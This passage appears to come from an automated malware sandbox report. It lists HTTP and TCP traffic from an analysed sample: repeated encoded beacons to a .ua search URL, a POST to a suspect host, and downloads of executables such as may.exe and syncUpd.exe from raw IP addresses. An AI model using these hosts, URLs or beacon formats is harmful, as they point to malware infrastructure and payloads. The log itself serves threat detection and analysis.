                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cdcspcgeqyf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: selebration17io.io
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.213.233.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.213.233.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.213.233.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.213.233.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.213.233.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.213.233.138
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.125.65.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.125.65.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.125.65.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.125.65.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.125.65.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.125.65.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.125.65.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 8.209.79.125
                  Source: unknownTCP traffic detected without corresponding DNS query: 45.125.65.112
                  Source: unknownTCP traffic detected without corresponding DNS query: 8.209.79.125
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.26.207.181
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                  Source: global trafficHTTP traffic detected: GET /photo/1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mmtplonline.com
                  Source: global trafficHTTP traffic detected: GET /data/pdf/may.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: asx.sunaviat.com
                  Source: global trafficHTTP traffic detected: GET /288c47bbc1871b439df19ff4df68f0776.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.172.128.19
                  Source: global trafficHTTP traffic detected: GET /check/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: trmpc.com
                  Source: global trafficHTTP traffic detected: GET /cpa/ping.php?substr=four&s=ab HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: 185.172.128.90Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /syncUpd.exe HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: 185.172.128.127Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /ping.php?substr=four HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: 5.42.64.33Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /emd/1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: emgvod.com
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929f3a HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /uploads/logo3.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: emgvod.com
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929f3a HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
